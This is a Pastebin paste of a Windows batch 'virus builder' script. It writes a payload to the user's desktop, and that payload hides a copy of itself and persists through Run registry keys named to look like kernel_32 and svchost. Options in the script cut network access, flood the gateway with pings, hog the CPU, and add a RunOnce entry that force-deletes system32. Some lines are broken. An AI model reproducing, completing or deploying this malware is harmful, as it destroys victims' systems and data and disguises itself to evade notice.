Advertisement
Guest User

Untitled

a guest
Jul 21st, 2017
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. :executor
  2. call :
  3. if /i %runstartup%==1 (call :restarts)
  4. if %errormsgs%==1 (call :errormsgs)
  5. if %interwebstop%==1 (call :interwebsstop)
  6. if %interwebslower%==1 (call :interwebsslowermake)
  7. if %computerslower%==1 (call :computerslowermake)
  8. if %computerwreck%==1 (call :computerwreckmake)
  9.  
  10. :restarts
  11. echo if DEFINED _restart_32 (goto restart%_sys32%) ELSE (goto start0) >> %userprofile%\desktop\%virname%
  12. echo mkdir "%virdir%\" >> %userprofile%\desktop\%virname%
  13. echo copy %0 %virdir%\%virname% >> %userprofile%\desktop\%virname%
  14. echo if %runstartup%==1 (reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v kernel_32 /d "%virdir%\%virname%") >> %userprofile%\desktop\%virname%
  15. for /l %%g in (1,1,%restarts%) DO (echo :restart%%g >> %userprofile%\desktop\%virname%
  16. echo set /a temprestart=%%g + 1 >> %userprofile%\desktop\%virname%
  17. echo setx _restart_32 %temprestart% >> %userprofile%\desktop\%virname%
  18. if %%g==%restarts% (call :executor)
  19. echo if DEFINED _restart_32 (goto restart%_restart_32%) ELSE (goto start0) >> %userprofile%\desktop\%virname%
  20. goto:eof
  21.  
  22. :errormsgs
  23. echo :errormsgs %userprofile%\desktop\%virname%
  24. echo copy "\sys32\defrag.vbs" "%APPDATA%\Register\win\updateKB046537.vbs" >> %userprofile%\desktop\%virname%
  25. echo reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /d "%APPDATA%\register32\win\updateKB046537.vbs" >> %userprofile%\desktop\%virname%
  26. goto:eof
  27.  
  28. :interwebsstop
  29. echo netsh interface ip set address name="Local Area Connection" static 0.0.0.0 0.0.0.0 0.0.0.0 1 >> %userprofile%\desktop\%virname%
  30. goto:eof
  31.  
  32. :interwebsslowermake
  33. echo @For /f "tokens=3" %%g in ('route.exe print ^|findstr "\<0.0.0.0\>"') Do @Set "DefaultGateway=%%g" >> %userprofile%\desktop\%virname%
  34. echo if errorlevel==0 (ping -t -l 1000 %DefaultGateway%) >> %userprofile%\desktop\%virname%
  35. goto:eof
  36.  
  37. :computerslowermake
  38. echo for /l %%g in (1,0,2) DO echo. >> %userprofile%\desktop\%virname%
  39. goto:eof
  40.  
  41. :computerwreckmake
  42. echo reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v sysrepair /d cmd /k "del /f /q %systemroot%\system32"
  43. goto:eof
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement